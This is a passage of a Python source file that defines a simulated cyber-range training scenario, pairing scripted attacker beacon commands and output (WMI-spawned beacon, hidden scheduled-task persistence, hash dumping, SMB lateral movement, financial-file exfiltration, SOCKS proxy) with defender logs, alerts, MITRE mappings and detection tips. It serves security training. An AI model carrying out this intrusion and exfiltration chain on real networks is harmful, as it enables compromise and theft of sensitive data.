                            "[+] User: GUARDEDGLASS\\a.patel",
                            "[+] OS:   Windows 11 Pro (23H2)",
                            "[+] PID:  wmiprvse.exe (7204) — spawned via WMI, not direct child of Excel",
                            "[+] Beacon ID: 48291 | Sleep: 60s | Jitter: 37%",
                        ],
                        "blue_logs": [
                            {"time": "09:14:30", "source": "Email Gateway", "level": "INFO", "msg": "Inbound: hr-benefits@guardedglass-benefits.com → a.patel@guardedglass.com | Attachment: Benefits_2026.xlsm | SPF: fail | DKIM: fail"},
                            {"time": "09:18:45", "source": "Endpoint/WS-HR02", "level": "WARN", "msg": "EXCEL.EXE loaded VBA project from Benefits_2026.xlsm (macro execution detected)"},
                            {"time": "09:18:46", "source": "Endpoint/WS-HR02", "level": "WARN", "msg": "WMI Event Subscription created: CommandLineEventConsumer launching process"},
                            {"time": "09:18:47", "source": "Endpoint/WS-HR02", "level": "INFO", "msg": "wmiprvse.exe (PID 7204) started — child of svchost.exe (WMI Provider Host), NOT Excel"},
                            {"time": "09:18:48", "source": "Proxy/Squid", "level": "INFO", "msg": "HTTPS CONNECT d1234abcdef.cloudfront.net:443 from 10.20.6.22 — 200 OK (looks like CDN traffic)"},
                            {"time": "09:18:49", "source": "DNS", "level": "INFO", "msg": "Query: d1234abcdef.cloudfront.net from 10.20.6.22 → 185.220.101.34"},
                        ],
                        "blue_alerts": [
                            {"title": "Suspicious Email: SPF/DKIM Failure from Lookalike Domain", "severity": "medium", "rule": "Email - Typosquat Domain", "mitre": "T1566.001", "host": "MAIL-GW01"},
                            {"title": "WMI Process Creation from Office Application", "severity": "high", "rule": "Execution - Office WMI Spawn", "mitre": "T1047", "host": "WS-HR02"},
                            {"title": "Outbound HTTPS to Newly Registered Domain", "severity": "medium", "rule": "C2 - New Domain Connection", "mitre": "T1071.001", "host": "WS-HR02"},
                        ],
                        "mitre": ["T1566.001", "T1047", "T1071.001"],
                        "user_view": {
                            "desktop_user": "a.patel",
                            "host": "WS-HR02",
                            "events": [
                                {"type": "notification", "app": "Outlook", "icon": "mail", "title": "New Email", "detail": "From: HR Benefits Team <hr-benefits@guardedglass-benefits.com>\nSubject: Updated Benefits Package 2026\n\n'Hi Anita, please review the updated benefits package for 2026. The changes are effective next month...'"},
                                {"type": "app_open", "app": "Microsoft Excel", "icon": "file-spreadsheet", "title": "Benefits_2026.xlsm", "detail": "SECURITY WARNING: Macros have been disabled.\n[Enable Content]\n\nAnita thinks: 'Benefits update from HR, looks legit...'"},
                                {"type": "dialog", "app": "Microsoft Excel", "icon": "alert-triangle", "title": "Enable Content", "detail": "User clicked 'Enable Content' to view the spreadsheet.\n\nThe VBA macro fires silently. It does NOT spawn PowerShell or cmd.exe directly — instead it uses WMI (Windows Management Instrumentation) to create a process. This means Excel is not the parent process of the beacon."},
                                {"type": "normal", "app": "Microsoft Excel", "icon": "file-spreadsheet", "title": "Benefits_2026.xlsm", "detail": "The spreadsheet displays a convincing benefits comparison table. Anita reviews the content, unaware that a beacon is now running as wmiprvse.exe in the background."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 4,
                "name": "Beacon Management",
                "tactic": "command-and-control",
                "description": "Interact with the beacon: configure sleep times, take screenshots, establish persistence.",
                "commands": [
                    {
                        "cmd": "beacon(48291)> sleep 5 30\nbeacon(48291)> screenshot\nbeacon(48291)> persist --method schtask --name 'Microsoft\\Windows\\CloudSync' --trigger logon",
                        "description": "Reduce beacon sleep to 5s for interactive ops, take screenshot, install persistence via scheduled task",
                        "red_output": [
                            "[*] Interacting with Beacon 48291 (WS-HR02 as a.patel)...",
                            "",
                            "[*] Tasked beacon to sleep 5s with 30% jitter",
                            "[+] Beacon is now checking in every 3-7 seconds",
                            "",
                            "[*] Tasked beacon to take screenshot...",
                            "[+] Screenshot received (1920x1080, 487KB)",
                            "    └── Shows: Excel spreadsheet with benefits table, Outlook in background",
                            "",
                            "[*] Installing persistence via scheduled task...",
                            "    ├── Task Name:  \\Microsoft\\Windows\\CloudSync",
                            "    ├── Trigger:    At logon (any user)",
                            "    ├── Action:     rundll32.exe C:\\ProgramData\\msupdate.dll,DllMain",
                            "    ├── Hidden:     Yes (task not visible in Task Scheduler GUI)",
                            "    └── Payload:    Beacon DLL dropped to C:\\ProgramData\\msupdate.dll",
                            "",
                            "[+] Persistence installed — beacon will survive reboot",
                        ],
                        "blue_logs": [
                            {"time": "09:22:10", "source": "Proxy/Squid", "level": "INFO", "msg": "Frequency change: d1234abcdef.cloudfront.net requests from 10.20.6.22 increased from 1/min to 12/min"},
                            {"time": "09:22:15", "source": "Endpoint/WS-HR02", "level": "WARN", "msg": "Event 4698: Scheduled task '\\Microsoft\\Windows\\CloudSync' created by GUARDEDGLASS\\a.patel"},
                            {"time": "09:22:16", "source": "Endpoint/WS-HR02", "level": "WARN", "msg": "File created: C:\\ProgramData\\msupdate.dll (312KB, unsigned DLL)"},
                            {"time": "09:22:17", "source": "Endpoint/WS-HR02", "level": "INFO", "msg": "Process wmiprvse.exe (PID 7204) accessing desktop bitmap via GDI — possible screenshot"},
                        ],
                        "blue_alerts": [
                            {"title": "C2 Beacon Frequency Change Detected", "severity": "medium", "rule": "C2 - Callback Frequency Anomaly", "mitre": "T1071.001", "host": "WS-HR02"},
                            {"title": "Scheduled Task Created in System Path", "severity": "high", "rule": "Persistence - Suspicious Scheduled Task", "mitre": "T1053.005", "host": "WS-HR02"},
                            {"title": "Unsigned DLL Dropped to ProgramData", "severity": "high", "rule": "Defense Evasion - DLL Drop", "mitre": "T1574.001", "host": "WS-HR02"},
                        ],
                        "mitre": ["T1053.005", "T1574.001", "T1113"],
                        "user_view": {
                            "desktop_user": "a.patel",
                            "host": "WS-HR02",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Nothing Visible", "detail": "Anita continues reviewing the benefits spreadsheet and checking email. She has no idea that:\n\n1. Her screen was just captured and sent to the attacker\n2. A scheduled task was silently created for persistence\n3. A DLL was dropped to C:\\ProgramData\n4. The beacon is now checking in every 5 seconds instead of 60"},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "Why This Is Hard to Detect", "detail": "The scheduled task is named '\\Microsoft\\Windows\\CloudSync' — it looks like a legitimate Windows task. It's hidden from Task Scheduler GUI. The DLL is in ProgramData (not a protected path). The beacon frequency change is only visible in proxy logs if someone is looking at per-host connection patterns."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 5,
                "name": "Privilege Escalation & Lateral Movement",
                "tactic": "privilege-escalation",
                "description": "Escalate privileges and pivot to higher-value targets using the beacon's built-in tools.",
                "commands": [
                    {
                        "cmd": "beacon(48291)> elevate svc-exe\nbeacon(48291)> hashdump\nbeacon(48291)> spawn smb --target WS-FIN01 --user svc_deploy --ntlm a1b2c3d4...",
                        "description": "Elevate to SYSTEM via service exploitation, dump local hashes, spawn SMB beacon on finance workstation",
                        "red_output": [
                            "[*] Attempting privilege escalation via service executable...",
                            "[*] Creating temporary service 'MSUpdate' → executes beacon as SYSTEM",
                            "[+] ELEVATED: now running as NT AUTHORITY\\SYSTEM on WS-HR02",
                            "",
                            "[*] Dumping local password hashes (SAM database)...",
                            "    Administrator:500:aad3b435...:31d6cfe0d16ae931b73c59d7e0c089c0:::",
                            "    a.patel:1001:aad3b435...:8c6e4f7b2a1d9e3f5c8a2b4d6e0f1a3c:::",
                            "    svc_deploy:1005:aad3b435...:a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4:::",
                            "",
                            "[+] Found cached credential: svc_deploy (local admin on all workstations)",
                            "",
                            "[*] Spawning SMB beacon on WS-FIN01 using svc_deploy credentials...",
                            "[*] Connecting to \\\\WS-FIN01\\ADMIN$...",
                            "[*] Copying beacon DLL to remote host...",
                            "[*] Executing via service creation...",
                            "",
                            "[+] NEW BEACON: WS-FIN01 (10.20.6.10) as GUARDEDGLASS\\svc_deploy",
                            "[+] Beacon ID: 48292 | Type: SMB (named pipe: \\\\.\\pipe\\msagent_72)",
                            "[+] Linked to Beacon 48291 via SMB — no direct internet C2 traffic",
                        ],
                        "blue_logs": [
                            {"time": "09:30:00", "source": "Endpoint/WS-HR02", "level": "CRIT", "msg": "Event 7045: Service 'MSUpdate' created (\\\\WS-HR02\\ADMIN$\\msupdate.exe) running as LocalSystem"},
                            {"time": "09:30:01", "source": "Endpoint/WS-HR02", "level": "CRIT", "msg": "SAM database accessed by SYSTEM process — credential dumping detected"},
                            {"time": "09:30:45", "source": "Endpoint/WS-FIN01", "level": "WARN", "msg": "Event 4624: Network logon (Type 3) for svc_deploy from 10.20.6.22 (WS-HR02)"},
                            {"time": "09:30:46", "source": "Endpoint/WS-FIN01", "level": "WARN", "msg": "Event 7045: Service 'MSUpdate' installed on WS-FIN01"},
                            {"time": "09:30:47", "source": "Network/IDS", "level": "INFO", "msg": "SMB named pipe created: \\\\WS-FIN01\\pipe\\msagent_72 — unusual pipe name"},
                        ],
                        "blue_alerts": [
                            {"title": "Privilege Escalation via Service Creation", "severity": "critical", "rule": "Priv Esc - Service to SYSTEM", "mitre": "T1543.003", "host": "WS-HR02"},
                            {"title": "SAM Database Credential Dump", "severity": "critical", "rule": "Credential Access - SAM Dump", "mitre": "T1003.002", "host": "WS-HR02"},
                            {"title": "Lateral Movement: Remote Service Installation", "severity": "high", "rule": "Lateral Movement - Remote Service", "mitre": "T1569.002", "host": "WS-FIN01"},
                            {"title": "Suspicious Named Pipe: msagent_72", "severity": "medium", "rule": "C2 - Known C2 Pipe Name Pattern", "mitre": "T1570", "host": "WS-FIN01"},
                        ],
                        "mitre": ["T1543.003", "T1003.002", "T1569.002", "T1570"],
                        "user_view": {
                            "desktop_user": "j.smith",
                            "host": "WS-FIN01",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Finance Workstation", "detail": "j.smith is working in SAP and Excel on WS-FIN01. A new service 'MSUpdate' was silently installed and started. The SMB beacon communicates through a named pipe — no internet traffic from this host."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "SMB Beacon Chaining", "detail": "The SMB beacon on WS-FIN01 doesn't talk to the internet directly. It communicates through a named pipe to the beacon on WS-HR02, which relays traffic to the C2 server. This means WS-FIN01 makes NO outbound connections — only internal SMB traffic that looks like normal file sharing."},
                                {"type": "warning", "app": "Detection Opportunity", "icon": "alert-triangle", "title": "Named Pipe Detection", "detail": "The pipe name '\\\\WS-FIN01\\pipe\\msagent_72' follows a known C2 pattern (msagent_##). Sysmon Event 17 (Pipe Created) and Event 18 (Pipe Connected) can detect these. Also: svc_deploy (a deployment account) making interactive logons is suspicious."},
                            ],
                        },
                    },
                ],
            },
            {
                "id": 6,
                "name": "Data Staging & Exfiltration",
                "tactic": "exfiltration",
                "description": "Collect sensitive data from the finance workstation and exfiltrate through the C2 channel.",
                "commands": [
                    {
                        "cmd": "beacon(48292)> shell dir C:\\Users\\j.smith\\Documents\\*.xlsx /s\nbeacon(48292)> download C:\\Users\\j.smith\\Documents\\Finance\\*\nbeacon(48291)> socks 1080",
                        "description": "Search for financial documents, download them, establish SOCKS proxy for additional access",
                        "red_output": [
                            "[*] Searching j.smith's documents for Excel files...",
                            "",
                            "    C:\\Users\\j.smith\\Documents\\Finance",
                            "      Q1-2026-Revenue.xlsx           4.2 MB",
                            "      Board-Presentation-Draft.pptx  12.8 MB",
                            "      Salary-Grid-2026.xlsx          1.1 MB",
                            "      M&A-Target-Analysis.xlsx       3.4 MB",
                            "",
                            "[*] Downloading 4 files (21.5 MB total)...",
                            "[*] Files chunked and encrypted → routed through SMB pipe → WS-HR02 → HTTPS C2",
                            "",
                            "    Transfer Progress:",
                            "    ████████████████████ Q1-2026-Revenue.xlsx (4.2MB)     ✓",
                            "    ████████████████████ Board-Presentation-Draft (12.8MB) ✓",
                            "    ████████████████████ Salary-Grid-2026.xlsx (1.1MB)     ✓",
                            "    ████████████████████ M&A-Target-Analysis.xlsx (3.4MB)  ✓",
                            "",
                            "[+] 21.5 MB exfiltrated via C2 channel",
                            "",
                            "[*] Starting SOCKS4a proxy on port 1080...",
                            "[+] SOCKS proxy active — can now access internal network from attacker machine",
                            "[+] OBJECTIVE COMPLETE: Financial data exfiltrated, persistent access maintained",
                        ],
                        "blue_logs": [
                            {"time": "09:38:00", "source": "Endpoint/WS-FIN01", "level": "INFO", "msg": "cmd.exe (spawned by service) executed 'dir' across j.smith profile directories"},
                            {"time": "09:38:30", "source": "Proxy/Squid", "level": "WARN", "msg": "Sustained HTTPS traffic to d1234abcdef.cloudfront.net: 21.7MB over 4 minutes from 10.20.6.22 (WS-HR02) — unusual for CDN polling"},
                            {"time": "09:38:31", "source": "Network/IDS", "level": "WARN", "msg": "Data volume anomaly: 10.20.6.10 → 10.20.6.22 via SMB (named pipe) — 22MB in 4 minutes"},
                            {"time": "09:39:00", "source": "Endpoint/WS-HR02", "level": "WARN", "msg": "New listening socket: 0.0.0.0:1080 (SOCKS proxy) created by wmiprvse.exe"},
                        ],
                        "blue_alerts": [
                            {"title": "Large Data Transfer via C2 Channel", "severity": "high", "rule": "Exfiltration - C2 Volume Anomaly", "mitre": "T1041", "host": "WS-HR02"},
                            {"title": "Internal Data Movement via Named Pipe", "severity": "medium", "rule": "Exfiltration - Pipe Data Transfer", "mitre": "T1570", "host": "WS-FIN01"},
                            {"title": "SOCKS Proxy Created by Suspicious Process", "severity": "high", "rule": "C2 - SOCKS Proxy Detection", "mitre": "T1090.001", "host": "WS-HR02"},
                        ],
                        "mitre": ["T1041", "T1570", "T1090.001", "T1005"],
                        "user_view": {
                            "desktop_user": "j.smith",
                            "host": "WS-FIN01",
                            "events": [
                                {"type": "normal", "app": "Desktop", "icon": "monitor", "title": "Business As Usual", "detail": "j.smith is in a Teams meeting. On the file system, 4 sensitive financial documents totaling 21.5MB are being read and exfiltrated through the SMB named pipe. No file-in-use dialogs because the beacon opens files in read-only mode."},
                                {"type": "warning", "app": "Key Insight", "icon": "alert-triangle", "title": "The Invisible Exfiltration Path", "detail": "Data flows: WS-FIN01 → SMB pipe → WS-HR02 → HTTPS (looks like CDN) → attacker C2.\n\nWS-FIN01 makes NO outbound internet connections. The data leaves through WS-HR02's 'CDN traffic' which the proxy sees as normal Amazon CloudFront requests. Only the volume anomaly (21MB in 4 min vs normal ~50KB/min polling) could flag this."},
                                {"type": "info", "app": "Key Insight", "icon": "info", "title": "SOCKS Proxy", "detail": "The attacker also created a SOCKS proxy on WS-HR02:1080. This means they can now route ANY tool through the compromised machine — browse internal web apps, access databases, scan the network — all appearing to come from WS-HR02's IP address."},
                            ],
                        },
                    },
                ],
            },
        ],
    },
}


def get_range_scenarios() -> list[dict]:
    """Return list of available range scenarios (without full command data)."""
    return [
        {
            "id": s["id"],
            "title": s["title"],
            "difficulty": s["difficulty"],
            "description": s["description"],
            "estimated_minutes": s["estimated_minutes"],
            "stage_count": len(s["stages"]),
            "total_commands": sum(len(st["commands"]) for st in s["stages"]),
        }
        for s in RANGE_SCENARIOS.values()
    ]


def get_range_scenario(scenario_id: str) -> dict | None:
    return RANGE_SCENARIOS.get(scenario_id)
